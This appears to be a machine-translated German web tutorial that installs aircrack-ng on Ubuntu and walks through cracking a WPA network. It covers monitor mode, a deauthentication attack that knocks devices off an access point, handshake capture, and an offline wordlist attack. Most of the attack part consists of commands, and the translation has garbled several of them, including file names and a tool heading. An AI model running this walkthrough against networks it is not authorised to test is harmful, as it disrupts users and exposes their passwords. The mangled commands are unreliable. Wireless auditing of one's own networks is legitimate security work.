Luftriss

Installieren Sie Aircrack-ng unter Ubuntu

Installieren Sie Aircrack-ng unter Ubuntu
Aircrack-ng ist eine ganze Reihe von Tools für Wireless Security Auditing. Es kann verwendet werden, um drahtlose Sicherheitsprotokolle wie WEP, WPA, WPA2 zu überwachen, zu testen, zu knacken oder anzugreifen. Aircrack-ng ist kommandozeilenbasiert und für Windows und Mac OS und andere Unix-basierte Betriebssysteme verfügbar. Die Aircrack-ng-Suite enthält viele Tools, die für verschiedene Zwecke verwendet werden, aber hier werden nur einige wichtige Tools betrachtet, die häufiger bei Wireless-Sicherheitstests verwendet werden.

Airmon-ng

Airmon-ng wird verwendet, um drahtlose Kartenmodi zu verwalten und unnötige Prozesse zu beenden, während Sie aircrack-ng verwenden. Um eine WLAN-Verbindung zu schnüffeln, müssen Sie Ihre WLAN-Karte vom Managed-Modus in den Monitor-Modus wechseln und dafür wird airmon-ng verwendet.

Luftabsaugung

Airodump-ng ist ein drahtloser Sniffer, der drahtlose Daten von einem oder mehreren drahtlosen Access Points erfassen kann. Es wird verwendet, um nahegelegene Access Points zu analysieren und Handshakes zu erfassen.

Aireplay-ng

Aireplay-ng wird für Replay-Angriffe und als Paketinjektor verwendet. Es können Benutzer von ihren APs de-authentifiziert werden, um Handshakes zu erfassen.

Airdecap-ng

Airdecap-ng wird verwendet, um verschlüsselte WEP-, WPA/WPA2-WLAN-Pakete mit bekanntem Schlüssel zu entschlüsseln.

Aircrack-ng

Aircrack-ng wird verwendet, um WPA/WEP-Funkprotokolle anzugreifen, um den Schlüssel zu finden.

Installation

Aircrack-ng ist einfach in Ubuntu mit APT . zu installieren. Geben Sie einfach den folgenden Befehl ein und dies installiert alle Tools, die in der Aircrack-ng-Suite verfügbar sind.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Verwendung

In diesem Artikel werfen wir einen kurzen Blick auf die Verwendung von aircrack-ng, um ein verschlüsseltes drahtloses Netzwerk (in diesem Beispiel TR1CKST3R) zu knacken, um das Passwort zu finden.

Listen Sie zunächst alle verfügbaren drahtlosen Karten auf, die mit Ihrem PC verbunden sind, indem Sie den Befehl 'iwconfig' verwenden.

Wir verwenden für dieses Tutorial die WLAN-Karte mit dem Namen 'wlxc83a35cb4546' (Dies kann in Ihrem Fall anders sein). Beenden Sie nun alle Prozesse, die auf der WLAN-Karte ausgeführt werden, mit airmon-ng.

[email protected]:~$ sudo airmon-ng check kill
Starten Sie den Monitormodus auf 'wlxc83a35cb4546', indem Sie Folgendes eingeben
[email protected]:~$ sudo airmon-ng start wlxc83a35cb4546

Jetzt hat airmon-ng den Monitormodus auf der WLAN-Karte gestartet, er wird als anderer Name "wlan0mon" angezeigt. Führen Sie 'iwconfig' erneut aus, um die WLAN-Details aufzulisten.

Verwenden Sie dann airodump-ng, um in der Nähe befindliche Wireless Access Points und deren Eigenschaften anzuzeigen.

[email protected]:~$ sudo airodump-ng wlan0mon

Sie können die Suche mit MAC (-bssid) und Kanal (-c) Filtern eingrenzen. Um den Handshake zu erfassen (Handshake enthält ein verschlüsseltes Passwort), müssen wir unsere Pakete mit der Option "-write" irgendwo speichern. Art,

[email protected]:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
-c 11 wlan0mon --write /tmp/handshake.Deckel
--bssid : MAC-Adresse des Access Points
-c : Kanal des Zugangspunkts [1-13]
--write : Speichert erfasste Pakete an einem definierten Ort

Jetzt müssen wir jedes Gerät von diesem Access Point mit dem Dienstprogramm Aireplay-ng de-authentifizieren. Schreiben

[email protected]:~$ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon

-a : Access Points MAC für Aireplay-ng . angeben

-0 : Geben Sie die Anzahl der zu sendenden Deauth-Pakete an

Nach einer Weile werden alle Geräte von diesem Access Point getrennt, wenn sie versuchen, sich erneut zu verbinden, wird der Handshake durch Ausführen von airodump-ng erfasst. Es wird oben beim Ausführen von airodump-ng . angezeigt.

Handshake wird im Verzeichnis '/tmp/' gespeichert und enthält ein verschlüsseltes Passwort, das offline mit einem Wörterbuch brutal erzwungen werden kann. Um das Passwort zu knacken, verwenden wir Aircrack-ng. Art

[email protected]:~$ sudo aircrack-ng /tmp/handshake.Kappe-01.Mütze -w
/usr/share/wordlists/rockyou.TXT
-w : Speicherort des Wörterbuchs angeben dictionary

Aircrack-ng geht die Liste der Passwörter durch und zeigt das als Schlüssel verwendete Passwort an, wenn es gefunden wird.

In diesem Fall hat aircrack-ng das verwendete Passwort '123456789' gefunden.

Stoppen Sie nun den Monitormodus auf der WLAN-Karte und starten Sie den Netzwerkmanager neu.

[email protected]:~$ sudo airmon-ng stop wlan0mon
[email protected]:~$ sudo service network-manager restart

Fazit

Aircrack-ng kann verwendet werden, um die Wireless-Sicherheit zu überprüfen oder vergessene Passwörter zu knacken. Es gibt einige andere ähnliche Werkzeuge für diesen Zweck wie Kismet, aber aircrack-ng ist besser bekannt für gute Unterstützung, Vielseitigkeit und eine breite Palette von Werkzeugen. Es verfügt über eine einfach zu bedienende Befehlszeilenschnittstelle, die mit jeder Skriptsprache wie Python leicht automatisiert werden kann.

So zeigen Sie den FPS-Zähler in Linux-Spielen an
Linux-Gaming bekam einen großen Schub, als Valve 2012 die Linux-Unterstützung für den Steam-Client und seine Spiele ankündigte. Seitdem haben viele AA...
Herunterladen und Spielen von Sid Meier's Civilization VI unter Linux and
Einführung in das Spiel Civilization 6 ist eine moderne Version des klassischen Konzepts, das in der Reihe der Age of Empires-Spiele eingeführt wurde....
So installieren und spielen Sie Doom unter Linux
Einführung in Doom Die Doom-Serie entstand in den 90er Jahren nach der Veröffentlichung des ursprünglichen Doom. Es war sofort ein Hit und seitdem hat...